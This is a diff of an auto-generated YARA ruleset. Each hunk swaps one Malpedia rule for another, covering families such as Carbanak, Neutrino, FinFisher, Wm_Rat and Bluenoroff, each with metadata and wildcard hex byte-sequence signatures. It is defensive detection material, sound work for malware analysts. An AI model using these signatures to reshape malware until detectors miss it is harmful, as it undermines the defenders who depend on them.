+		$sequence_9 = { 894e0c 8b5010 895610 8b4814 894e14 8b5018 895618 }
 
 	condition:
-		7 of them and filesize < 8692736
+		7 of them and filesize < 452608
 }
-rule MALPEDIA_Win_Beepservice_Auto : FILE
+rule MALPEDIA_Win_Simplefilemover_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c4c53131-cb7f-5347-a9b9-cf736a2ce9c3"
+		id = "01e3a38c-ca1c-54f8-8b63-a6fb5042b331"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.beepservice"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.beepservice_auto.yar#L1-L282"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.simplefilemover"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.simplefilemover_auto.yar#L1-L220"
 		license_url = "N/A"
-		logic_hash = "689010a7eaeffaf34a3ec3394a2430b997d2d5b1ebae027e3c89a6f3e221798c"
+		logic_hash = "127d7e5e1cb1879a98229e20253c6e3598e5576a92a3becd73c38551f6d4a8f9"
 		score = 75
 		quality = 73
 		tags = "FILE"
@@ -94431,51 +94580,44 @@ rule MALPEDIA_Win_Beepservice_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b0d???????? 68???????? ffd6 8bc8 }
-		$sequence_1 = { ffd6 8bc8 ff15???????? 50 ff15???????? }
-		$sequence_2 = { 683f000f00 6a00 68???????? ff15???????? }
-		$sequence_3 = { e8???????? 83f801 7505 e8???????? 68???????? 68???????? }
-		$sequence_4 = { 7512 6888130000 68???????? e8???????? 83c408 }
-		$sequence_5 = { 83c408 e9???????? 68???????? e8???????? 83c404 6a00 6a00 }
-		$sequence_6 = { 8d85fcfdffff 56 56 6a02 56 56 }
-		$sequence_7 = { 6a20 57 bf???????? 57 }
-		$sequence_8 = { 68???????? e8???????? ff7608 e8???????? 83c40c }
-		$sequence_9 = { ff7614 e8???????? 50 ff7614 57 e8???????? 83c42c }
-		$sequence_10 = { 6a02 50 55 e8???????? ff7610 e8???????? 50 }
-		$sequence_11 = { e8???????? 83c444 8d442410 6a02 }
-		$sequence_12 = { 85f6 7403 56 ffd7 53 ffd7 5f }
-		$sequence_13 = { b90a000000 a3???????? bf???????? a3???????? }
-		$sequence_14 = { 8b5c240c 8b3d???????? 85f6 7403 }
-		$sequence_15 = { 741e 45 83fd0a 7ce0 eb23 ff15???????? }
-		$sequence_16 = { ffd7 8d442414 50 56 }
-		$sequence_17 = { c785f8fdffff00240000 6a00 8d95f4fdffff 52 8b85f8fdffff 50 }
-		$sequence_18 = { 83f81e 720a b801000000 e9???????? 8b450c 8b480c }
-		$sequence_19 = { 8b85f8fdffff 50 68???????? 8b8dfcfdffff 51 ff15???????? }
-		$sequence_20 = { 8b5108 52 68???????? e8???????? 83c40c 6a02 }
-		$sequence_21 = { 50 e8???????? 83c404 c3 6a00 6a00 }
-		$sequence_22 = { a1???????? 85c0 746b a1???????? 85c0 7562 }
-		$sequence_23 = { 48 83f804 0f8795000000 ff248548144000 6888130000 6a01 6a00 }
-		$sequence_24 = { 85c9 668935???????? 7e15 b299 8a9874304000 32da }
-		$sequence_25 = { 83c414 e8???????? 6a00 6a00 b907000000 6a00 }
-		$sequence_26 = { 57 33f6 8975d8 8975e0 8975e4 8975dc 8975fc }
-		$sequence_27 = { 83c404 c3 8b0d???????? 6aff 51 }
-		$sequence_28 = { 6a03 e8???????? 83c414 e9???????? a1???????? }
+		$sequence_0 = { 8bfc f3a5 e8???????? 81c420020000 }
+		$sequence_1 = { 7d07 33c0 e9???????? 6820020000 ff15???????? }
+		$sequence_2 = { e8???????? 81c420020000 85c0 7407 68???????? eb05 68???????? }
+		$sequence_3 = { b988000000 8bf3 8bfc f3a5 }
+		$sequence_4 = { 57 668b01 33f6 33db 33ff }
+		$sequence_5 = { 750f c78508daffff00000000 e9???????? 6a04 8d8d54daffff }
+		$sequence_6 = { 3bc3 0f8ec7020000 0145ec 397dec 7416 8b45ec }
+		$sequence_7 = { 7433 8bcb 663d5c00 7503 }
+		$sequence_8 = { 56 8b74241c 57 8a8800010000 8a9001010000 33ff 884c2408 }
+		$sequence_9 = { 8b742424 53 81e1ff000000 55 81e6ff000000 }
+		$sequence_10 = { 3bfb 0f8c54ffffff 8a4c242c 5d 5b 5f }
+		$sequence_11 = { 895df4 eb03 8b7df0 8d4601 be00010000 99 }
+		$sequence_12 = { 8b7c2418 8b5c2428 47 897c2418 0fbfff 3bfb 0f8c54ffffff }
+		$sequence_13 = { 8b7c2424 b940000000 f3a5 83c40c }
+		$sequence_14 = { e8???????? 83c410 e9???????? 83bd24daffff00 7e0c c78508daffff00000000 }
+		$sequence_15 = { 83c102 42 6685c0 75ea 85f6 7417 8b4c2414 }
+		$sequence_16 = { 0f8eda000000 8b4c2408 8b742424 53 }
+		$sequence_17 = { ebca ebc8 ebc6 ebc4 ebc2 }
+		$sequence_18 = { 50 8d85b0ddffff 50 e8???????? 8b45f4 03c0 }
+		$sequence_19 = { 6a00 6a00 6a04 6a00 6a02 6800000040 8d85f8fdffff }
+		$sequence_20 = { 50 ff15???????? 898510daffff 6a00 }
+		$sequence_21 = { 51 8b9554faffff 52 ff15???????? 898508daffff 83bd08daffffff }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Gratem_Auto : FILE
+rule MALPEDIA_Win_Fakerean_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ab5cab4a-386c-5ff0-b7ae-5f5f77749cf9"
+		id = "9b6d4199-0c17-5326-ad0f-5be4f4e0c769"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gratem"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gratem_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakerean"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fakerean_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "faae71a2a37b93e3d77306cf98fe40a8f8f60859a11449c5f85889b06fd54fb4"
+		logic_hash = "697015d76e682efb24cb879c686000a5c02640696936de86fa6c90584950d55f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94489,34 +94631,34 @@ rule MALPEDIA_Win_Gratem_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 55 8bec 8b4508 56 8d34c5c0b84000 833e00 7513 }
-		$sequence_1 = { c6040400 8d1424 52 ff15???????? 8b8c2408010000 33cc }
-		$sequence_2 = { 8945fc 85c0 742f 8b0e 8b5710 51 52 }
-		$sequence_3 = { 0fb7048d64bc4000 41 6685c0 75e4 32c0 88460f c3 }
-		$sequence_4 = { ff15???????? 8945fc 85c0 742f 8b0e }
-		$sequence_5 = { 0fb6c0 eb12 8b45e0 8a803cb44000 08443b1d }
-		$sequence_6 = { 663bc2 0f84e6020000 0fb7048d64bc4000 41 6685c0 }
-		$sequence_7 = { 0fb7c0 baa3170000 663bc2 0f84e6020000 0fb7048d64bc4000 41 6685c0 }
-		$sequence_8 = { 0f84de030000 0fb7048d64bc4000 41 6685c0 75e4 }
-		$sequence_9 = { 0f8469010000 0fb7048d64bc4000 41 6685c0 75e4 }
+		$sequence_0 = { ff7508 898348030000 ff15???????? 5f 5e 5b c9 }
+		$sequence_1 = { 50 e8???????? 83c40c 8b4640 2b4638 85c0 7f1c }
+		$sequence_2 = { ff15???????? a1???????? 8b08 6a01 ff35???????? 50 ff5128 }
+		$sequence_3 = { 8845f8 84c9 7419 8b4508 0345fc 0fb6d9 }
+		$sequence_4 = { 8d45f0 50 ff7608 ff15???????? 83f801 743e 83f802 }
+		$sequence_5 = { e8???????? 83c428 8935???????? 5f 5e c9 c3 }
+		$sequence_6 = { 8b45f0 eb03 8b45ec 8945f8 eb1d 8b45fc ebf6 }
+		$sequence_7 = { 8bc2 ab ab ab ab 6a08 59 }
+		$sequence_8 = { c6450f30 eb0f 83fe01 0f95c0 fec8 2420 0441 }
+		$sequence_9 = { f7fb 83c230 668911 03cf 397d0c 7512 85c0 }
 
 	condition:
-		7 of them and filesize < 155648
+		7 of them and filesize < 4071424
 }
-rule MALPEDIA_Win_Carbanak_Auto : FILE
+rule MALPEDIA_Win_Neutrino_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "aedde496-1e00-538c-b489-6c77c5599b0a"
+		id = "90362f91-7989-59b7-8491-41ee08cb7ec9"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.carbanak_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.neutrino_auto.yar#L1-L311"
 		license_url = "N/A"
-		logic_hash = "0f833e010e6f92f115d02deffe6d957025aee9eed313be7bf6c5b84cdc07ff91"
-		score = 75
-		quality = 75
+		logic_hash = "a2300db6491e65a144d0716ad0d9afc9f3b5ec715da52155c4f75ceb78588a52"
+		score = 60
+		quality = 43
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -94528,32 +94670,54 @@ rule MALPEDIA_Win_Carbanak_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7c0d e8???????? 84c0 7504 33c0 }
-		$sequence_1 = { 7907 32c0 e9???????? 7507 }
-		$sequence_2 = { 85c0 7509 e8???????? b001 }
-		$sequence_3 = { e9???????? 7507 b001 e9???????? }
-		$sequence_4 = { e9???????? 3d2c5c0700 750a e8???????? e9???????? }
-		$sequence_5 = { 488d4dc8 4183c8ff 488bd0 488bd8 e8???????? 488bcb }
-		$sequence_6 = { 41ffc1 ba23000000 48895c2428 48895c2420 e8???????? }
-		$sequence_7 = { ff75fc 8ad8 e8???????? 83c414 84db 7511 }
-		$sequence_8 = { 6aff 68???????? 6a01 8d4dec 51 }
-		$sequence_9 = { 50 50 ff7510 ff750c 50 ff7508 }
+		$sequence_0 = { ff15???????? c1e010 50 ff15???????? }
+		$sequence_1 = { 50 6a0b 6a07 e8???????? }
+		$sequence_2 = { 50 6a05 6a03 e8???????? }
+		$sequence_3 = { 0404 010404 0202 020402 }
+		$sequence_4 = { 50 6a00 6a00 ff15???????? 8b4dd8 }
+		$sequence_5 = { 010404 0202 020402 0404 0404 0404 }
+		$sequence_6 = { 8b4d0c 894dfc 8b55f4 0fbe02 85c0 7447 8b4df4 }
+		$sequence_7 = { e9???????? 6a01 ff15???????? 85c0 }
+		$sequence_8 = { 83c404 0fb6d0 83fa01 7531 8b45fc 83c001 8945fc }
+		$sequence_9 = { 51 8b5508 52 ff15???????? 83f8ff 7504 32c0 }
+		$sequence_10 = { 83c201 8955f4 ebaf 8b45f4 a3???????? 8b45f8 2b45f4 }
+		$sequence_11 = { 894d08 0fb6550c 83fa01 7509 8b4508 83c001 894508 }
+		$sequence_12 = { 6a00 ff15???????? 6880000000 ff15???????? }
+		$sequence_13 = { 0fbe02 8b4df8 0fbe11 3bc2 740b 8b45fc 83c001 }
+		$sequence_14 = { 8b55fc 0fbe02 85c0 750f 8b4d0c 894dfc 8b55f4 }
+		$sequence_15 = { 0f8440feffff 80fa05 7354 8b3b 0fb6f2 6a05 }
+		$sequence_16 = { f645fe20 740d 814a1804010000 8a03 884210 43 8ac3 }
+		$sequence_17 = { 32c0 c645ff00 895dec c645fb00 f3aa c645f810 }
+		$sequence_18 = { 807dfd05 eb12 807dfd04 c645fc03 0f879a000000 807dfd01 }
+		$sequence_19 = { 0f879a000000 807dfd01 0f8597000000 e9???????? 2d8c000000 747e 48 }
+		$sequence_20 = { 8b03 894210 83c304 eb13 f645fe20 740d 814a1804010000 }
+		$sequence_21 = { c3 8b4804 890e ff4808 897004 751e }
+		$sequence_22 = { 83c404 85c0 0f95c2 0fb6c2 }
+		$sequence_23 = { 55 8bec 81ecf80f0000 837d0800 }
+		$sequence_24 = { 8d85b8feffff 50 68???????? ff15???????? 8945fc }
+		$sequence_25 = { 83c40c 6804010000 8d85f8fdffff 50 }
+		$sequence_26 = { ff750c ff7508 ff15???????? 83f8ff 0f95c0 }
+		$sequence_27 = { 7522 be???????? ff15???????? 57 8906 ff15???????? 83c604 }
+		$sequence_28 = { 7507 68???????? eb05 68???????? 50 ff510c }
+		$sequence_29 = { 50 ff15???????? 837dfc00 0f95c0 c9 c3 }
+		$sequence_30 = { 7412 68???????? 50 ff15???????? f7d8 1bc0 40 }
+		$sequence_31 = { 50 ff15???????? 6a40 ff75f0 }
 
 	condition:
-		7 of them and filesize < 658432
+		7 of them and filesize < 507904
 }
-rule MALPEDIA_Win_Highnote_Auto : FILE
+rule MALPEDIA_Win_Ralord_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b0d28496-8673-59fb-b567-198b148df4f3"
+		id = "55aeafd0-036d-55da-b447-46a69b58ad1c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.highnote"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.highnote_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ralord"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ralord_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "7cacc14b2d0dfaf54710df19550a1288a5ab7f5eb6146a6937a043c66ae24b0f"
+		logic_hash = "0ae32be56308293e8dfe3d78f9cfa5ac160d76644a256ed6b1f7ab39bfe6b399"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94567,32 +94731,32 @@ rule MALPEDIA_Win_Highnote_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3c7b bc9e36398f 8027e9 82ad42476080cd e009 }
-		$sequence_1 = { 47 365e 3007 7bae 97 9d 884d13 }
-		$sequence_2 = { a8b9 a1???????? 9c 6857414608 d4dc 59 93 }
-		$sequence_3 = { 33c5 8945fc 8b4508 53 6808090000 8945e4 e8???????? }
-		$sequence_4 = { 4f 59 7def 889de81be9ec b96b0b724f 262415 3a1f }
-		$sequence_5 = { 0e ed 47 6908b79d84b8 6935????????3e1f20f8 4a d14529 }
-		$sequence_6 = { e76e a9a4fec7f3 1b90bff8ccdd b1e4 f7f4 }
-		$sequence_7 = { 0f85dc000000 b763 42 20ce e04b 2bea }
-		$sequence_8 = { 1cfe 5f 3d4b9c06b4 12a4c5ea7849d5 ba7ab47152 1c98 d24cdca8 }
-		$sequence_9 = { 3cff 145d 853e 235ee7 }
+		$sequence_0 = { 7473 66813e4250 488d05d0a30100 7465 66813e5246 488d05c1a30100 7457 }
+		$sequence_1 = { 490b8818080000 756c 4c89c1 4889c6 e8???????? 4889f0 eb5c }
+		$sequence_2 = { 4929d0 0f82c9000000 4939fc 0f87d2000000 4c01f2 4889f1 e8???????? }
+		$sequence_3 = { 4801f0 4829d0 4839f0 0f83bb020000 4d8d7b01 410fb60406 4138040e }
+		$sequence_4 = { 48837d2000 7406 807d2f00 7409 4883c428 5b 5f }
+		$sequence_5 = { 752a 488b4e20 488b4628 488d15522b0100 41b801000000 ff5018 89c1 }
+		$sequence_6 = { 0f80de010000 4839fa 7550 4c8b4dd0 4c89c8 48f7d8 0f80c9010000 }
+		$sequence_7 = { 4889f1 eb27 89442430 488d0551850200 4889442420 488d15a0850200 488d4c2440 }
+		$sequence_8 = { 488d0daf640100 ba10000000 e8???????? 41b601 84c0 0f85b7000000 48c70600000000 }
+		$sequence_9 = { 400f90c6 430fb6141a 83c2d0 83fa09 0f87aa090000 }
 
 	condition:
-		7 of them and filesize < 321536
+		7 of them and filesize < 798720
 }
-rule MALPEDIA_Win_Finfisher_Auto : FILE
+rule MALPEDIA_Win_Wm_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3bd8079e-f604-51ea-b8f2-fef52df0002f"
+		id = "c6756856-697a-5678-ac68-3f5e48855d20"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.finfisher_auto.yar#L1-L140"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wm_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.wm_rat_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "36bd2bd78748a7bd0a2049fe313cd0daa82b47af68134d330004d325ff7392ca"
+		logic_hash = "17d23eab1cdfe83be57cb83b91146c56a89d3518780617b00510aa5e646a5ec0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94606,36 +94770,32 @@ rule MALPEDIA_Win_Finfisher_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 56 8d85ccf9ffff 50 }
-		$sequence_1 = { 68???????? 6804010000 8d85ccf9ffff 50 }
-		$sequence_2 = { 8d85bcf7ffff 50 6a01 56 56 }
-		$sequence_3 = { 0f855b040000 8b85b0f7ffff 8b400c 8b8db8f7ffff 8908 89bda0f7ffff }
-		$sequence_4 = { 6a04 56 ff15???????? 8bd8 3bdf 7561 }
-		$sequence_5 = { e8???????? b982000000 8bf7 8dbddcfdffff f3a5 }
-		$sequence_6 = { 48 7526 8b4508 8b4028 }
-		$sequence_7 = { 56 53 50 ff15???????? eb05 }
-		$sequence_8 = { 8d45f4 50 53 897508 e8???????? }
-		$sequence_9 = { 8bd8 ff15???????? 8845ff 897df8 }
-		$sequence_10 = { 8b7508 89b5ccfdffff 85f6 7508 }
-		$sequence_11 = { 8bd8 3bde 0f8583030000 66c78572f7ffff0401 }
-		$sequence_12 = { 6824020000 68???????? e8???????? 8b7508 }
-		$sequence_13 = { 897de4 56 e8???????? 50 }
+		$sequence_0 = { 89481c 894820 894824 6a00 b901000000 6a00 6689480c }
+		$sequence_1 = { 8d8c24e4110000 ff15???????? c684247c31020056 8b8424d4110000 8b4804 f6840cdc11000006 0f842c010000 }
+		$sequence_2 = { 83f8ff 0f8423070000 90 f684247402000010 0f8492020000 68fc070000 8d8c24f80b0000 }
+		$sequence_3 = { ff15???????? 33c9 6a30 51 8d9424aa100000 }
+		$sequence_4 = { 8b4c240c 6aff 8d542414 894608 }
+		$sequence_5 = { 83c404 6a64 ffd6 8b4c2414 51 e8???????? 83c404 }
+		$sequence_6 = { b804000000 2bc6 50 8d0c3e 51 52 }
+		$sequence_7 = { 50 8b4204 ffd0 c684245402000000 8b44241c 83c0f0 8d480c }
+		$sequence_8 = { 84c0 0f84f4e9ffff 83ec1c 8bcc 89642434 68???????? ff15???????? }
+		$sequence_9 = { 3b01 743b 8b542428 8b4e14 2bd0 8d4c0a01 51 }
 
 	condition:
-		7 of them and filesize < 262144
+		7 of them and filesize < 258048
 }
-rule MALPEDIA_Win_Turnedup_Auto : FILE
+rule MALPEDIA_Win_Bluenoroff_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f4a24578-5335-5053-b07f-943404877172"
+		id = "715350ff-965b-560c-8af6-f01ef8d9887d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.turnedup_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluenoroff"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bluenoroff_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "70af128b8d10ec8ac1a0ea6deea907b76cc81c6db7a8cb227ddf71385e7b13b6"
+		logic_hash = "09078eca5d74bcdca0f6c272495f67d2206bb2b723aa1a39684e4df83692420a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94649,32 +94809,32 @@ rule MALPEDIA_Win_Turnedup_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a0d c741140f000000 c7411000000000 68???????? 8945a8 c60100 }
-		$sequence_1 = { 85db 7417 8d4df4 8bf3 }
-		$sequence_2 = { 7f0d 0fbed0 0fbec1 8d4a05 }
-		$sequence_3 = { c70600000000 c6460401 807e0530 0f8cf1000000 807e0400 7538 8b0e }
-		$sequence_4 = { 740f e8???????? 8b4dbc 8801 }
-		$sequence_5 = { 8d44244c 50 e8???????? dd542448 8b442434 }
-		$sequence_6 = { 7405 884305 eb06 c70300000000 c6430401 8a4b05 884dbb }
-		$sequence_7 = { ffd3 83ec1c 8bcc 6a0d c741140f000000 c7411000000000 68???????? }
-		$sequence_8 = { c60100 e8???????? c3 56 }
-		$sequence_9 = { 8945fc 8d45fc 50 8d4df0 e8???????? 68???????? }
+		$sequence_0 = { ff15???????? 33ff 53 ff15???????? 8b450c }
+		$sequence_1 = { 8bf0 83c404 85f6 7429 8b4508 8b5510 }
+		$sequence_2 = { 8bf8 85ff 7421 6a00 8d55fc 52 56 }
+		$sequence_3 = { b912010000 8bf3 f3a5 a1???????? 8b5004 83c410 8d7004 }
+		$sequence_4 = { 83c41c 83f801 750e 8d8dfcfffeff }
+		$sequence_5 = { 83feff 7433 8d4e01 51 6a40 ff15???????? }
+		$sequence_6 = { 51 52 8d85fcfffeff 68ffff0000 }
+		$sequence_7 = { 83c41c 8d95ecfffeff 33c9 52 }
+		$sequence_8 = { 7433 8d4e01 51 6a40 }
+		$sequence_9 = { 8d8dfcfffeff 51 68???????? eb23 83f802 }
 
 	condition:
-		7 of them and filesize < 892928
+		7 of them and filesize < 303104
 }
-rule MALPEDIA_Win_Lambert_Auto : FILE
+rule MALPEDIA_Win_Webc2_Bolid_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "766677fc-20f5-5c4e-acc7-a5a40372da69"
+		id = "d7b8b0f8-fb67-56c4-b24d-dcdab9f7b909"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lambert_auto.yar#L1-L161"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_bolid"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webc2_bolid_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "60e780dd4c006048bc0528824ae1f73ab836d6b104a44501df20cceb325dce70"
+		logic_hash = "a9749882fbe9a2a48ffae4420a547a6fbd11851e4362f65200b42858f5a2933e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94688,38 +94848,32 @@ rule MALPEDIA_Win_Lambert_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4f 42 3b7d10 724d }
-		$sequence_1 = { 8b4d08 03481c 894de4 8b55f4 8b45e4 }
-		$sequence_2 = { 33ce 314de8 890a 894de4 }
-		$sequence_3 = { 7402 eb60 8b45fc 83c078 8945f0 8b4df0 }
-		$sequence_4 = { 85c0 741f 8b4df8 c1e90d 8b55f8 c1e213 0bca }
-		$sequence_5 = { 41 8801 41 e9???????? 6afc 2b4d10 8b5514 }
-		$sequence_6 = { 0f82a4000000 83fe06 0f822cffffff 8bc1 }
-		$sequence_7 = { 33ce 33d1 33da 8970f0 }
-		$sequence_8 = { 51 e8???????? 0fb7d0 0355f8 }
-		$sequence_9 = { 0bca 894df8 8b45fc 0fb708 51 e8???????? }
-		$sequence_10 = { 33c1 03c0 33c8 8bc1 c1e808 }
-		$sequence_11 = { 8945fc 8b4d0c 8b55fc 3b5118 }
-		$sequence_12 = { 2bc2 83f801 0f8208010000 803a00 }
-		$sequence_13 = { 4f 42 42 eb56 }
-		$sequence_14 = { 8b5508 031481 8955f4 8b45f4 50 e8???????? }
-		$sequence_15 = { f7d2 8b45f4 335004 8955f8 8b4df4 }
+		$sequence_0 = { 7f31 8b8bc8000000 8b93c4000000 6a00 41 6a00 }
+		$sequence_1 = { e8???????? 84c0 7427 8bcf 8b7b70 8d436c 8bd1 }
+		$sequence_2 = { 8b55ec 8d8d54ffffff 51 52 50 8d45a0 50 }
+		$sequence_3 = { e8???????? 8bd8 3bde 0f8e0c060000 8a451b 56 8d8d58ffffff }
+		$sequence_4 = { 83c40c 8b15???????? 8d4de4 52 }
+		$sequence_5 = { 8b4dec 8b75e4 03c1 894508 }
+		$sequence_6 = { fec8 8801 eb09 51 e8???????? 83c404 8b7db8 }
+		$sequence_7 = { 50 c3 6a02 e8???????? 59 c3 }
+		$sequence_8 = { 8a01 4a 0fb6f0 f6860132410004 8807 7413 47 }
+		$sequence_9 = { c68424240200000d e8???????? 83ec10 8d9424a0000000 8bcc 89a424c4000000 52 }
 
 	condition:
-		7 of them and filesize < 1205248
+		7 of them and filesize < 163840
 }
-rule MALPEDIA_Win_Suncrypt_Auto : FILE
+rule MALPEDIA_Win_Goopic_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7f081e6a-91fb-536b-b660-2da418a7ac6f"
+		id = "3dc4c257-a5c8-5a4d-ab14-c83ca28cb2ec"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.suncrypt"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.suncrypt_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.goopic"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.goopic_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "25c1a2f4bf5a2bd511d08d2068ef5b4858a377d650c7c729810ab075898356ca"
+		logic_hash = "44b46e1ba9017c5fbd258e5f68a3335c35049c2540cd88d9310017d21c5cf5d5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94733,32 +94887,32 @@ rule MALPEDIA_Win_Suncrypt_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33d2 c68518ffffff6e c68519ffffff64 c6851affffff13 c6851bffffff2d c6851cffffff28 c6851dffffff28 }
-		$sequence_1 = { 0fbec0 33c1 884415c8 42 83fa1c 72e9 8d4dc8 }
-		$sequence_2 = { 6a00 6a00 6a00 6a00 ff35???????? be00310884 c745e000010000 }
-		$sequence_3 = { 0405 83f031 8845f9 8b45f0 0406 83f02e 8845fa }
-		$sequence_4 = { 8bec 8a5508 80fa2c 7446 a0???????? b9???????? 84c0 }
-		$sequence_5 = { ff15???????? 8bf0 85f6 742a 83feff 7425 8d45e8 }
-		$sequence_6 = { 8b7308 83c140 8b7da0 894df4 8b4df0 eb7e }
-		$sequence_7 = { 0f28dc 660ffe9df0fdffff 0f28c3 660fef45a0 0f28c8 660f72f00c 660f72d114 }
-		$sequence_8 = { 83fa11 72e8 ff7510 8d45ec 885dfd ff750c }
-		$sequence_9 = { 8bc3 85c9 7411 660f1f440000 803800 740b 47 }
+		$sequence_0 = { 89742414 ff15???????? 50 ff15???????? 85c0 7427 }
+		$sequence_1 = { 0f84c6000000 833d????????00 740d 8d85f0fdffff 50 }
+		$sequence_2 = { 85c0 7411 e8???????? ba01000000 }
+		$sequence_3 = { c785d0fdffff2c020000 ff15???????? 8bf0 8d85d0fdffff 50 56 89b5ccfdffff }
+		$sequence_4 = { 58 6bc000 c7803430400002000000 6a04 58 }
+		$sequence_5 = { 68???????? 6a01 6a00 68???????? ff15???????? 85c0 0f888e000000 }
+		$sequence_6 = { be00010000 33c0 66c787000100000000 8801 8d4901 40 663bc6 }
+		$sequence_7 = { ffd7 e8???????? e8???????? 8bd6 }
+		$sequence_8 = { b9???????? e8???????? 83c404 8d85f8dfffff }
+		$sequence_9 = { c785c0fdffff305d4000 eb0a c785c0fdffff245d4000 8d85b4fdffff c785c4fdffff3c5d4000 50 }
 
 	condition:
-		7 of them and filesize < 172032
+		7 of them and filesize < 114688
 }
